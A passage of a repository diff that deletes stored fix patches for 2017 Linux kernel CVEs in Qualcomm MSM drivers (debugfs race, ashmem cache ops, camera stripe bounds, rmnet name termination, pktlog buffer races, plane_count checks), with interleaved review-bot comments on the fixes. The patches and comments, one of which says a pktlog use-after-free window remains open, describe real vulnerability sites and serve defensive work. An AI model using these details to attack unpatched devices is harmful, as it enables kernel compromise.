sizeof(buf)) || copy_to_user(buff, buf, len)) { -+ mutex_unlock(&mdss_debug_lock); - return -EFAULT; -+ } - - *ppos += len; /* increase offset */ - -+ mutex_unlock(&mdss_debug_lock); - return len; - } - -@@ -472,6 +497,8 @@ static ssize_t mdss_debug_base_reg_read(struct file *file, - return -ENODEV; - } - -+ mutex_lock(&mdss_debug_lock); -+ - if (!dbg->buf) { - char dump_buf[64]; - char *ptr; -@@ -483,6 +510,7 @@ static ssize_t mdss_debug_base_reg_read(struct file *file, - - if (!dbg->buf) { - pr_err("not enough memory to hold reg dump\n"); -+ mutex_unlock(&mdss_debug_lock); - return -ENOMEM; - } - -@@ -513,17 +541,21 @@ static ssize_t mdss_debug_base_reg_read(struct file *file, - dbg->buf_len = tot; - } - -- if (*ppos >= dbg->buf_len) -+ if (*ppos >= dbg->buf_len) { -+ mutex_unlock(&mdss_debug_lock); - return 0; /* done reading */ -+ } - - len = min(count, dbg->buf_len - (size_t) *ppos); - if (copy_to_user(user_buf, dbg->buf + *ppos, len)) { - pr_err("failed to copy to user\n"); -+ mutex_unlock(&mdss_debug_lock); - return -EFAULT; - } - - *ppos += len; /* increase offset 
*/ - -+ mutex_unlock(&mdss_debug_lock); - return len; - } - --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2017-8266/3.18/0002.patch b/Patches/Linux_CVEs/CVE-2017-8266/3.18/0002.patch deleted file mode 100644 index 508dd353..00000000 --- a/Patches/Linux_CVEs/CVE-2017-8266/3.18/0002.patch +++ /dev/null 
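Review bot: The lock is released by hand before every return in panel_debug_base_reg_read and mdss_debug_base_reg_read, which makes it easy for a later exit path to leave mdss_debug_lock held. The body of panel_debug_base_reg_read between its two hunks is not shown, so any return there that does not go through `read_reg_fail` would already do so; that is worth confirming against the full function. A single exit makes the pairing obvious: set `rc` at each failure and `goto unlock;`, ending the function with `unlock: mutex_unlock(&mdss_debug_lock); return rc;`. A one-line comment at the `DEFINE_MUTEX` saying that it guards `dbg->off`, `dbg->cnt`, `dbg->buf` and `dbg->buf_len` would also help the next reader.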
@@ -1,52 +0,0 @@ -From 42627c94cf8c189332a6f5bfdd465ea662777911 Mon Sep 17 00:00:00 2001 -From: Harsh Sahu -Date: Thu, 13 Apr 2017 15:38:46 -0700 -Subject: msm: mdss: fix race condition during mdp debugfs release - -Fix race condition in the release of the mdp debugfs functions -panel_debug_base_release and mdss_debug_base_release by adding -the lock for unpreempted freeing of the buffer so that multiple -concurrent processes cannot affect the release which can possibly -lead to use-after-free operation on the buffer. - -Change-Id: I9586081b65ae2eb0e7f6e30c606ee748ae9ef7e8 -Signed-off-by: Harsh Sahu ---- - drivers/video/msm/mdss/mdss_debug.c | 4 ++++ - 1 file changed, 4 insertions(+) - -diff --git a/drivers/video/msm/mdss/mdss_debug.c b/drivers/video/msm/mdss/mdss_debug.c -index 920babf..78bfe50 100644 ---- a/drivers/video/msm/mdss/mdss_debug.c -+++ b/drivers/video/msm/mdss/mdss_debug.c -@@ -57,11 +57,13 @@ static int panel_debug_base_open(struct inode *inode, struct file *file) - static int panel_debug_base_release(struct inode *inode, struct file *file) - { - struct mdss_debug_base *dbg = file->private_data; -+ mutex_lock(&mdss_debug_lock); - if (dbg && dbg->buf) { - kfree(dbg->buf); - dbg->buf_len = 0; - dbg->buf = NULL; - } -+ mutex_unlock(&mdss_debug_lock); - return 0; - } - -@@ -386,11 +388,13 @@ static int mdss_debug_base_open(struct inode *inode, struct file *file) - static int mdss_debug_base_release(struct inode *inode, struct file *file) - { - struct mdss_debug_base *dbg = file->private_data; -+ mutex_lock(&mdss_debug_lock); - if (dbg && dbg->buf) { - kfree(dbg->buf); - dbg->buf_len = 0; - dbg->buf = NULL; - } -+ mutex_unlock(&mdss_debug_lock); - return 0; - } - --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2017-8266/4.4/0003.patch b/Patches/Linux_CVEs/CVE-2017-8266/4.4/0003.patch deleted file mode 100644 index 3f7a27f3..00000000 --- a/Patches/Linux_CVEs/CVE-2017-8266/4.4/0003.patch +++ /dev/null 
@@ -1,52 +0,0 @@ -From 64e4e29356928bea60ae4be5b387eb7d8d7a7f45 Mon Sep 17 00:00:00 2001 -From: Harsh Sahu -Date: Thu, 13 Apr 2017 15:38:46 -0700 -Subject: msm: mdss: fix race condition during mdp debugfs release - -Fix race condition in the release of the mdp debugfs functions -panel_debug_base_release and mdss_debug_base_release by adding -the lock for unpreempted freeing of the buffer so that multiple -concurrent processes cannot affect the release which can possibly -lead to use-after-free operation on the buffer. - -Change-Id: I9586081b65ae2eb0e7f6e30c606ee748ae9ef7e8 -Signed-off-by: Harsh Sahu ---- - drivers/video/fbdev/msm/mdss_debug.c | 4 ++++ - 1 file changed, 4 insertions(+) - -diff --git a/drivers/video/fbdev/msm/mdss_debug.c b/drivers/video/fbdev/msm/mdss_debug.c -index e6086914..0ecf1ef 100644 ---- a/drivers/video/fbdev/msm/mdss_debug.c -+++ b/drivers/video/fbdev/msm/mdss_debug.c -@@ -59,11 +59,13 @@ static int panel_debug_base_open(struct inode *inode, struct file *file) - static int panel_debug_base_release(struct inode *inode, struct file *file) - { - struct mdss_debug_base *dbg = file->private_data; -+ mutex_lock(&mdss_debug_lock); - if (dbg && dbg->buf) { - kfree(dbg->buf); - dbg->buf_len = 0; - dbg->buf = NULL; - } -+ mutex_unlock(&mdss_debug_lock); - return 0; - } - -@@ -385,11 +387,13 @@ static int mdss_debug_base_open(struct inode *inode, struct file *file) - static int mdss_debug_base_release(struct inode *inode, struct file *file) - { - struct mdss_debug_base *dbg = file->private_data; -+ mutex_lock(&mdss_debug_lock); - if (dbg && dbg->buf) { - kfree(dbg->buf); - dbg->buf_len = 0; - dbg->buf = NULL; - } -+ mutex_unlock(&mdss_debug_lock); - return 0; - } - --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2017-8267/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-8267/ANY/0001.patch deleted file mode 100644 index 61f054bd..00000000 --- a/Patches/Linux_CVEs/CVE-2017-8267/ANY/0001.patch +++ /dev/null 
@@ -1,99 +0,0 @@ -From 2a2f0b7463f4de9ca225769204ff62c71760709c Mon Sep 17 00:00:00 2001 -From: Sudarshan Rajagopalan -Date: Thu, 6 Apr 2017 16:15:48 -0700 -Subject: ashmem: remove cache maintenance support - -The cache maintenance routines in ashmem were causing -several security issues. Since they are not being used -anymore by any drivers, its well to remove them entirely. - -CRs-Fixed: 1107034, 2001129, 2007786 -Change-Id: I955e33d90b888d58db5cf6bb490905283374425b -Signed-off-by: Sudarshan Rajagopalan ---- - drivers/staging/android/ashmem.c | 41 ---------------------------------------- - include/uapi/linux/ashmem.h | 3 --- - 2 files changed, 44 deletions(-) - -diff --git a/drivers/staging/android/ashmem.c b/drivers/staging/android/ashmem.c -index ee79ac8..f13aab2 100644 ---- a/drivers/staging/android/ashmem.c -+++ b/drivers/staging/android/ashmem.c -@@ -32,7 +32,6 @@ - #include - #include - #include --#include - - #include "ashmem.h" - -@@ -659,37 +658,6 @@ static int ashmem_pin_unpin(struct ashmem_area *asma, unsigned long cmd, - return ret; - } - --static int ashmem_cache_op(struct ashmem_area *asma, -- void (*cache_func)(const void *vstart, const void *vend)) --{ -- int ret = 0; -- struct vm_area_struct *vma; -- if (!asma->vm_start) -- return -EINVAL; -- -- down_read(¤t->mm->mmap_sem); -- vma = find_vma(current->mm, asma->vm_start); -- if (!vma) { -- ret = -EINVAL; -- goto done; -- } -- if (vma->vm_file != asma->file) { -- ret = -EINVAL; -- goto done; -- } -- if ((asma->vm_start + asma->size) > vma->vm_end) { -- ret = -EINVAL; -- goto done; -- } -- cache_func((void *)asma->vm_start, -- (void *)(asma->vm_start + asma->size)); --done: -- up_read(¤t->mm->mmap_sem); -- if (ret) -- asma->vm_start = 0; -- return ret; --} -- - static long ashmem_ioctl(struct file *file, unsigned int cmd, unsigned long arg) - { - struct ashmem_area *asma = file->private_data; -@@ -735,15 +703,6 @@ static long ashmem_ioctl(struct file *file, unsigned int cmd, unsigned long arg) - 
ashmem_shrink(&ashmem_shrinker, &sc); - } - break; -- case ASHMEM_CACHE_FLUSH_RANGE: -- ret = ashmem_cache_op(asma, &dmac_flush_range); -- break; -- case ASHMEM_CACHE_CLEAN_RANGE: -- ret = ashmem_cache_op(asma, &dmac_clean_range); -- break; -- case ASHMEM_CACHE_INV_RANGE: -- ret = ashmem_cache_op(asma, &dmac_inv_range); -- break; - } - - return ret; -diff --git a/include/uapi/linux/ashmem.h b/include/uapi/linux/ashmem.h -index 7ec977f..7797439 100644 ---- a/include/uapi/linux/ashmem.h -+++ b/include/uapi/linux/ashmem.h -@@ -34,8 +34,5 @@ struct ashmem_pin { - #define ASHMEM_UNPIN _IOW(__ASHMEMIOC, 8, struct ashmem_pin) - #define ASHMEM_GET_PIN_STATUS _IO(__ASHMEMIOC, 9) - #define ASHMEM_PURGE_ALL_CACHES _IO(__ASHMEMIOC, 10) --#define ASHMEM_CACHE_FLUSH_RANGE _IO(__ASHMEMIOC, 11) --#define ASHMEM_CACHE_CLEAN_RANGE _IO(__ASHMEMIOC, 12) --#define ASHMEM_CACHE_INV_RANGE _IO(__ASHMEMIOC, 13) - - #endif /* _UAPI_LINUX_ASHMEM_H */ --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2017-8268/3.10/0001.patch b/Patches/Linux_CVEs/CVE-2017-8268/3.10/0001.patch deleted file mode 100644 index ae5c451f..00000000 --- a/Patches/Linux_CVEs/CVE-2017-8268/3.10/0001.patch +++ /dev/null 
@@ -1,79 +0,0 @@ -From 5f3b68da4c8f6474df2497b6d912465d640904b8 Mon Sep 17 00:00:00 2001 -From: Ravi kumar Koyyana -Date: Tue, 11 Apr 2017 18:47:44 -0700 -Subject: msm: camera2: cpp: Fix out-of-bounds frame or command buffer access - -When user application provides invalid (out of range) stripe size and -stripe indices, while submitting requests for the stripe based image -processing by the CPP kernel driver, the driver could perform out of -bounds access of the internal buffers. - -This fix ensures that stripe size and indices of frame/command buffer -are properly validated during the configuration and before processing -such requests through the CPP hardware block. - -CRs-fixed: 2002207 -Change-Id: Ib79e36fb507d8e75d8fc28afb990020a0e1bf845 -Signed-off-by: Ravi kumar Koyyana ---- - .../platform/msm/camera_v2/pproc/cpp/msm_cpp.c | 33 ++++++++++++++++++---- - 1 file changed, 27 insertions(+), 6 deletions(-) - -diff --git a/drivers/media/platform/msm/camera_v2/pproc/cpp/msm_cpp.c b/drivers/media/platform/msm/camera_v2/pproc/cpp/msm_cpp.c -index 79a8e8e..8269dc7 100644 ---- a/drivers/media/platform/msm/camera_v2/pproc/cpp/msm_cpp.c -+++ b/drivers/media/platform/msm/camera_v2/pproc/cpp/msm_cpp.c -@@ -2281,9 +2281,29 @@ static int msm_cpp_cfg_frame(struct cpp_device *cpp_dev, - return -EINVAL; - } - -- if (stripe_base == UINT_MAX || new_frame->num_strips > -- (UINT_MAX - 1 - stripe_base) / stripe_size) { -- pr_err("Invalid frame message,num_strips %d is large\n", -+ /* Stripe index starts at zero */ -+ if ((!new_frame->num_strips) || -+ (new_frame->first_stripe_index >= new_frame->num_strips) || -+ (new_frame->last_stripe_index >= new_frame->num_strips) || -+ (new_frame->first_stripe_index > -+ new_frame->last_stripe_index)) { -+ pr_err("Invalid frame message, #stripes=%d, stripe indices=[%d,%d]\n", -+ new_frame->num_strips, -+ new_frame->first_stripe_index, -+ new_frame->last_stripe_index); -+ return -EINVAL; -+ } -+ -+ if (!stripe_size) { -+ pr_err("Invalid frame 
message, invalid stripe_size (%d)!\n", -+ stripe_size); -+ return -EINVAL; -+ } -+ -+ if ((stripe_base == UINT_MAX) || -+ (new_frame->num_strips > -+ (UINT_MAX - 1 - stripe_base) / stripe_size)) { -+ pr_err("Invalid frame message, num_strips %d is large\n", - new_frame->num_strips); - return -EINVAL; - } -@@ -2523,13 +2543,14 @@ static int msm_cpp_cfg(struct cpp_device *cpp_dev, - struct msm_cpp_frame_info_t *frame = NULL; - struct msm_cpp_frame_info_t k_frame_info; - int32_t rc = 0; -- int32_t i = 0; -- int32_t num_buff = sizeof(k_frame_info.output_buffer_info)/ -+ uint32_t i = 0; -+ uint32_t num_buff = sizeof(k_frame_info.output_buffer_info) / - sizeof(struct msm_cpp_buffer_info_t); -+ - if (copy_from_user(&k_frame_info, - (void __user *)ioctl_ptr->ioctl_ptr, - sizeof(k_frame_info))) -- return -EFAULT; -+ return -EFAULT; - - frame = msm_cpp_get_frame(ioctl_ptr); - if (!frame) { --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2017-8268/4.4/0002.patch b/Patches/Linux_CVEs/CVE-2017-8268/4.4/0002.patch deleted file mode 100644 index dc7ee887..00000000 --- a/Patches/Linux_CVEs/CVE-2017-8268/4.4/0002.patch +++ /dev/null 
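Review bot: The new stripe validation in msm_cpp_cfg_frame carries a redundant comparison and an under-specified comment. Once `last_stripe_index < num_strips` and `first_stripe_index <= last_stripe_index` hold, the test `first_stripe_index >= num_strips` can never fire. The comment `/* Stripe index starts at zero */` would be more useful if it stated the invariant being enforced on user-supplied values, for example `/* From userspace: require first_stripe_index <= last_stripe_index < num_strips, num_strips != 0 */`. The `pr_err` calls print these fields with `%d`; if they are unsigned in `msm_cpp_frame_info_t` (not visible here), `%u` avoids logging large values as negative. The same hunk appears in the 4.4 copy of this patch further down and the same remarks apply.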
@@ -1,79 +0,0 @@ -From fab64410d005a7dee8ed02557a0ca26e4c5242ff Mon Sep 17 00:00:00 2001 -From: Ravi kumar Koyyana -Date: Tue, 11 Apr 2017 18:47:44 -0700 -Subject: msm: camera2: cpp: Fix out-of-bounds frame or command buffer access - -When user application provides invalid (out of range) stripe size and -stripe indices, while submitting requests for the stripe based image -processing by the CPP kernel driver, the driver could perform out of -bounds access of the internal buffers. - -This fix ensures that stripe size and indices of frame/command buffer -are properly validated during the configuration and before processing -such requests through the CPP hardware block. - -CRs-fixed: 2002207 -Change-Id: Ib79e36fb507d8e75d8fc28afb990020a0e1bf845 -Signed-off-by: Ravi kumar Koyyana ---- - .../platform/msm/camera_v2/pproc/cpp/msm_cpp.c | 33 ++++++++++++++++++---- - 1 file changed, 27 insertions(+), 6 deletions(-) - -diff --git a/drivers/media/platform/msm/camera_v2/pproc/cpp/msm_cpp.c b/drivers/media/platform/msm/camera_v2/pproc/cpp/msm_cpp.c -index 95aac07..b7feb12 100644 ---- a/drivers/media/platform/msm/camera_v2/pproc/cpp/msm_cpp.c -+++ b/drivers/media/platform/msm/camera_v2/pproc/cpp/msm_cpp.c -@@ -2542,9 +2542,29 @@ static int msm_cpp_cfg_frame(struct cpp_device *cpp_dev, - return -EINVAL; - } - -- if (stripe_base == UINT_MAX || new_frame->num_strips > -- (UINT_MAX - 1 - stripe_base) / stripe_size) { -- pr_err("Invalid frame message,num_strips %d is large\n", -+ /* Stripe index starts at zero */ -+ if ((!new_frame->num_strips) || -+ (new_frame->first_stripe_index >= new_frame->num_strips) || -+ (new_frame->last_stripe_index >= new_frame->num_strips) || -+ (new_frame->first_stripe_index > -+ new_frame->last_stripe_index)) { -+ pr_err("Invalid frame message, #stripes=%d, stripe indices=[%d,%d]\n", -+ new_frame->num_strips, -+ new_frame->first_stripe_index, -+ new_frame->last_stripe_index); -+ return -EINVAL; -+ } -+ -+ if (!stripe_size) { -+ pr_err("Invalid frame 
message, invalid stripe_size (%d)!\n", -+ stripe_size); -+ return -EINVAL; -+ } -+ -+ if ((stripe_base == UINT_MAX) || -+ (new_frame->num_strips > -+ (UINT_MAX - 1 - stripe_base) / stripe_size)) { -+ pr_err("Invalid frame message, num_strips %d is large\n", - new_frame->num_strips); - return -EINVAL; - } -@@ -2785,13 +2805,14 @@ static int msm_cpp_cfg(struct cpp_device *cpp_dev, - struct msm_cpp_frame_info_t *frame = NULL; - struct msm_cpp_frame_info_t k_frame_info; - int32_t rc = 0; -- int32_t i = 0; -- int32_t num_buff = sizeof(k_frame_info.output_buffer_info)/ -+ uint32_t i = 0; -+ uint32_t num_buff = sizeof(k_frame_info.output_buffer_info) / - sizeof(struct msm_cpp_buffer_info_t); -+ - if (copy_from_user(&k_frame_info, - (void __user *)ioctl_ptr->ioctl_ptr, - sizeof(k_frame_info))) -- return -EFAULT; -+ return -EFAULT; - - frame = msm_cpp_get_frame(ioctl_ptr); - if (!frame) { --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2017-8269/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-8269/ANY/0001.patch deleted file mode 100644 index 686acd01..00000000 --- a/Patches/Linux_CVEs/CVE-2017-8269/ANY/0001.patch +++ /dev/null 
@@ -1,38 +0,0 @@ -From b925d9f76164475abb6f6a557327095156c9b249 Mon Sep 17 00:00:00 2001 -From: Skylar Chang -Date: Fri, 14 Apr 2017 19:23:05 -0700 -Subject: msm: rmnet_ipa: fix security issue - -Fix the security issue where mux channel name might -not be null-terminated in ipa wan driver. - -Change-Id: I3ef440b62cf3861464fb60c1e7f65f2be5e39ed0 -Acked-by: Shihuan Liu -Signed-off-by: Skylar Chang ---- - drivers/platform/msm/ipa/rmnet_ipa.c | 5 ++++- - 1 file changed, 4 insertions(+), 1 deletion(-) - -diff --git a/drivers/platform/msm/ipa/rmnet_ipa.c b/drivers/platform/msm/ipa/rmnet_ipa.c -index 3f073f2..a2c838b 100644 ---- a/drivers/platform/msm/ipa/rmnet_ipa.c -+++ b/drivers/platform/msm/ipa/rmnet_ipa.c -@@ -1,4 +1,4 @@ --/* Copyright (c) 2014, The Linux Foundation. All rights reserved. -+/* Copyright (c) 2017, The Linux Foundation. All rights reserved. - * - * This program is free software; you can redistribute it and/or modify - * it under the terms of the GNU General Public License version 2 and -@@ -1236,6 +1236,9 @@ static int ipa_wwan_ioctl(struct net_device *dev, struct ifreq *ifr, int cmd) - memcpy(mux_channel[rmnet_index].vchannel_name, - extend_ioctl_data.u.rmnet_mux_val.vchannel_name, - sizeof(mux_channel[rmnet_index].vchannel_name)); -+ mux_channel[rmnet_index].vchannel_name[ -+ IFNAMSIZ - 1] = '\0'; -+ - IPAWANDBG("cashe device[%s:%d] in IPA_wan[%d]\n", - mux_channel[rmnet_index].vchannel_name, - mux_channel[rmnet_index].mux_id, --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2017-8270/qcacld-3.0/0001.patch b/Patches/Linux_CVEs/CVE-2017-8270/qcacld-3.0/0001.patch deleted file mode 100644 index 2824db06..00000000 --- a/Patches/Linux_CVEs/CVE-2017-8270/qcacld-3.0/0001.patch +++ /dev/null 
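Review bot: The terminator in ipa_wwan_ioctl is written at `IFNAMSIZ - 1`, while the preceding memcpy is sized by `sizeof(mux_channel[rmnet_index].vchannel_name)`, so the two only agree if the array is declared with exactly IFNAMSIZ bytes (its declaration is outside the hunk). Deriving the index from the array keeps them tied together: `mux_channel[rmnet_index].vchannel_name[sizeof(mux_channel[rmnet_index].vchannel_name) - 1] = '\0';`. The memcpy also reads `sizeof` of the destination from `extend_ioctl_data.u.rmnet_mux_val.vchannel_name`, which is safe only if the source field is at least as large; a bounded string copy such as `strlcpy` would terminate the name and bound the read in one step.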
@@ -1,204 +0,0 @@ -From ff96565f1dbabfeb7fb2c1604f40af768579d9df Mon Sep 17 00:00:00 2001 -From: Ashish Kumar Dhanotiya -Date: Fri, 14 Apr 2017 16:55:34 +0530 -Subject: qcacld-3.0: Race condition while using pkt log buffer - -There can be a race condition if two different threads use the -pkt log buffer at the same time. This issue can lead to Use-After-Free -of the packet log buffer. - -To address this issue, protect the pktlog buffer access using spinlock. - -Change-Id: I8098bb78a8e2462e109cee3407683c669f151fd5 -CRs-Fixed: 2021363 ---- - core/utils/pktlog/linux_ac.c | 31 +++++++++++++++++++++++++------ - core/utils/pktlog/pktlog_ac.c | 5 +++++ - 2 files changed, 30 insertions(+), 6 deletions(-) - -diff --git a/core/utils/pktlog/linux_ac.c b/core/utils/pktlog/linux_ac.c -index 974cd2a..eb0943f 100644 ---- a/core/utils/pktlog/linux_ac.c -+++ b/core/utils/pktlog/linux_ac.c -@@ -520,12 +520,15 @@ static void pktlog_detach(struct hif_opaque_softc *scn) - pl_info = pl_dev->pl_info; - remove_proc_entry(WLANDEV_BASENAME, g_pktlog_pde); - pktlog_sysctl_unregister(pl_dev); -- pktlog_cleanup(pl_info); -+ -+ spin_lock_bh(&pl_info->log_lock); - - if (pl_info->buf) { - pktlog_release_buf(scn); - pl_dev->tgt_pktlog_alloced = false; - } -+ spin_unlock_bh(&pl_info->log_lock); -+ pktlog_cleanup(pl_info); - - if (pl_dev) { - kfree(pl_info); -@@ -701,11 +704,16 @@ pktlog_read_proc_entry(char *buf, size_t nbytes, loff_t *ppos, - int rem_len; - int start_offset, end_offset; - int fold_offset, ppos_data, cur_rd_offset, cur_wr_offset; -- struct ath_pktlog_buf *log_buf = pl_info->buf; -+ struct ath_pktlog_buf *log_buf; -+ -+ spin_lock_bh(&pl_info->log_lock); -+ log_buf = pl_info->buf; -+ - *read_complete = false; - - if (log_buf == NULL) { - *read_complete = true; -+ spin_unlock_bh(&pl_info->log_lock); - return 0; - } - -@@ -808,7 +816,6 @@ rd_done: - *ppos += ret_val; - - if (ret_val == 0) { -- PKTLOG_LOCK(pl_info); - /* Write pointer might have been updated during the read. 
- * So, if some data is written into, lets not reset the pointers - * We can continue to read from the offset position -@@ -822,9 +829,8 @@ rd_done: - pl_info->buf->offset = PKTLOG_READ_OFFSET; - *read_complete = true; - } -- PKTLOG_UNLOCK(pl_info); - } -- -+ spin_unlock_bh(&pl_info->log_lock); - return ret_val; - } - -@@ -849,16 +855,20 @@ __pktlog_read(struct file *file, char *buf, size_t nbytes, loff_t *ppos) - if (!pl_info) - return 0; - -+ spin_lock_bh(&pl_info->log_lock); - log_buf = pl_info->buf; - -- if (log_buf == NULL) -+ if (log_buf == NULL) { -+ spin_unlock_bh(&pl_info->log_lock); - return 0; -+ } - - if (pl_info->log_state) { - /* Read is not allowed when write is going on - * When issuing cat command, ensure to send - * pktlog disable command first. - */ -+ spin_unlock_bh(&pl_info->log_lock); - return -EINVAL; - } - -@@ -875,11 +885,13 @@ __pktlog_read(struct file *file, char *buf, size_t nbytes, loff_t *ppos) - - if (*ppos < bufhdr_size) { - count = QDF_MIN((bufhdr_size - *ppos), rem_len); -+ spin_unlock_bh(&pl_info->log_lock); - if (copy_to_user(buf, ((char *)&log_buf->bufhdr) + *ppos, - count)) - return -EFAULT; - rem_len -= count; - ret_val += count; -+ spin_lock_bh(&pl_info->log_lock); - } - - start_offset = log_buf->rd_offset; -@@ -921,19 +933,23 @@ __pktlog_read(struct file *file, char *buf, size_t nbytes, loff_t *ppos) - goto rd_done; - - count = QDF_MIN(rem_len, (end_offset - ppos_data + 1)); -+ spin_unlock_bh(&pl_info->log_lock); - if (copy_to_user(buf + ret_val, - log_buf->log_data + ppos_data, count)) - return -EFAULT; - ret_val += count; - rem_len -= count; -+ spin_lock_bh(&pl_info->log_lock); - } else { - if (ppos_data <= fold_offset) { - count = QDF_MIN(rem_len, (fold_offset - ppos_data + 1)); -+ spin_unlock_bh(&pl_info->log_lock); - if (copy_to_user(buf + ret_val, - log_buf->log_data + ppos_data, count)) - return -EFAULT; - ret_val += count; - rem_len -= count; -+ spin_lock_bh(&pl_info->log_lock); - } - - if (rem_len == 0) -@@ -945,11 
+961,13 @@ __pktlog_read(struct file *file, char *buf, size_t nbytes, loff_t *ppos) - - if (ppos_data <= end_offset) { - count = QDF_MIN(rem_len, (end_offset - ppos_data + 1)); -+ spin_unlock_bh(&pl_info->log_lock); - if (copy_to_user(buf + ret_val, - log_buf->log_data + ppos_data, count)) - return -EFAULT; - ret_val += count; - rem_len -= count; -+ spin_lock_bh(&pl_info->log_lock); - } - } - -@@ -960,6 +978,7 @@ rd_done: - } - *ppos += ret_val; - -+ spin_unlock_bh(&pl_info->log_lock); - return ret_val; - } - -diff --git a/core/utils/pktlog/pktlog_ac.c b/core/utils/pktlog/pktlog_ac.c -index ab0be7c..524591b 100644 ---- a/core/utils/pktlog/pktlog_ac.c -+++ b/core/utils/pktlog/pktlog_ac.c -@@ -457,6 +457,7 @@ int pktlog_enable(struct hif_opaque_softc *scn, int32_t log_state, - - } - -+ spin_lock_bh(&pl_info->log_lock); - pl_info->buf->bufhdr.version = CUR_PKTLOG_VER; - pl_info->buf->bufhdr.magic_num = PKTLOG_MAGIC_NUM; - pl_info->buf->wr_offset = 0; -@@ -465,6 +466,7 @@ int pktlog_enable(struct hif_opaque_softc *scn, int32_t log_state, - pl_info->buf->bytes_written = 0; - pl_info->buf->msg_index = 1; - pl_info->buf->offset = PKTLOG_READ_OFFSET; -+ spin_unlock_bh(&pl_info->log_lock); - - pl_info->start_time_thruput = os_get_timestamp(); - pl_info->start_time_per = pl_info->start_time_thruput; -@@ -542,12 +544,14 @@ int pktlog_setsize(struct hif_opaque_softc *scn, int32_t size) - return -EINVAL; - } - -+ spin_lock_bh(&pl_info->log_lock); - if (pl_info->buf != NULL) { - if (pl_dev->is_pktlog_cb_subscribed && - wdi_pktlog_unsubscribe(pdev_txrx_handle, - pl_info->log_state)) { - pl_info->curr_pkt_state = PKTLOG_OPR_NOT_IN_PROGRESS; - printk("Cannot unsubscribe pktlog from the WDI\n"); -+ spin_unlock_bh(&pl_info->log_lock); - return -EFAULT; - } - pktlog_release_buf(scn); -@@ -560,6 +564,7 @@ int pktlog_setsize(struct hif_opaque_softc *scn, int32_t size) - pl_info->buf_size = size; - } - pl_info->curr_pkt_state = PKTLOG_OPR_NOT_IN_PROGRESS; -+ 
spin_unlock_bh(&pl_info->log_lock); - return 0; - } - --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2017-8272/4.4/0001.patch b/Patches/Linux_CVEs/CVE-2017-8272/4.4/0001.patch deleted file mode 100644 index e83bab49..00000000 --- a/Patches/Linux_CVEs/CVE-2017-8272/4.4/0001.patch +++ /dev/null 
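Review bot: In __pktlog_read the lock is dropped around every copy_to_user(), but the copy source is still `log_buf->log_data` (or `&log_buf->bufhdr`), reached through the pointer cached before the unlock. A concurrent pktlog_setsize() or pktlog_detach() that reaches pktlog_release_buf() can therefore free the buffer while the copy is running, so the use-after-free window described in the commit message is narrowed rather than closed. The data should be staged into a kernel buffer while log_lock is held and copied to userspace only after the unlock. At the least, each re-lock should be followed by `log_buf = pl_info->buf;` and a NULL check before the pointer is used again. pktlog_setsize() now calls wdi_pktlog_unsubscribe() and pktlog_release_buf() with spin_lock_bh held; neither body is visible here, so it should be confirmed that neither can sleep.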
@@ -1,60 +0,0 @@ -From a8cb976e7c8f25191728b655e0b38328a6d7d81f Mon Sep 17 00:00:00 2001 -From: Benjamin Chan -Date: Wed, 19 Apr 2017 16:24:40 -0400 -Subject: msm: mdss: Add plane_count range check in mdss WFD - -For any given output buffer to the MDSS WFD, it is necessary to check -the range of the plane_count against the MAX_PLANES definition, in order -to avoid any out of bound access. - -CRs-Fixed: 2028702 -Change-Id: I4f1497a3a2e4ca2d30fc268e68cfdacc0d8539ea -Signed-off-by: Benjamin Chan ---- - drivers/video/fbdev/msm/mdss_mdp_layer.c | 6 ++++++ - drivers/video/fbdev/msm/mdss_mdp_wfd.c | 8 +++++++- - 2 files changed, 13 insertions(+), 1 deletion(-) - -diff --git a/drivers/video/fbdev/msm/mdss_mdp_layer.c b/drivers/video/fbdev/msm/mdss_mdp_layer.c -index 09a3422..5e96a08 100644 ---- a/drivers/video/fbdev/msm/mdss_mdp_layer.c -+++ b/drivers/video/fbdev/msm/mdss_mdp_layer.c -@@ -3035,6 +3035,12 @@ int mdss_mdp_layer_pre_commit_wfd(struct msm_fb_data_type *mfd, - wfd = mdp5_data->wfd; - output_layer = commit->output_layer; - -+ if (output_layer->buffer.plane_count > MAX_PLANES) { -+ pr_err("Output buffer plane_count exceeds MAX_PLANES limit:%d\n", -+ output_layer->buffer.plane_count); -+ return -EINVAL; -+ } -+ - data = mdss_mdp_wfd_add_data(wfd, output_layer); - if (IS_ERR_OR_NULL(data)) - return PTR_ERR(data); -diff --git a/drivers/video/fbdev/msm/mdss_mdp_wfd.c b/drivers/video/fbdev/msm/mdss_mdp_wfd.c -index 71a07f6..7868dc0 100644 ---- a/drivers/video/fbdev/msm/mdss_mdp_wfd.c -+++ b/drivers/video/fbdev/msm/mdss_mdp_wfd.c -@@ -1,4 +1,4 @@ --/* Copyright (c) 2015-2016, The Linux Foundation. All rights reserved. -+/* Copyright (c) 2015-2017, The Linux Foundation. All rights reserved. 
- * - * This program is free software; you can redistribute it and/or modify - * it under the terms of the GNU General Public License version 2 and -@@ -322,6 +322,12 @@ int mdss_mdp_wb_import_data(struct device *device, - if (wfd_data->layer.flags & MDP_LAYER_SECURE_SESSION) - flags = MDP_SECURE_OVERLAY_SESSION; - -+ if (buffer->plane_count > MAX_PLANES) { -+ pr_err("buffer plane_count exceeds MAX_PLANES limit:%d", -+ buffer->plane_count); -+ return -EINVAL; -+ } -+ - memset(planes, 0, sizeof(planes)); - - for (i = 0; i < buffer->plane_count; i++) { --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2017-8277/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-8277/ANY/0001.patch deleted file mode 100644 index aba95594..00000000 --- a/Patches/Linux_CVEs/CVE-2017-8277/ANY/0001.patch +++ /dev/null 
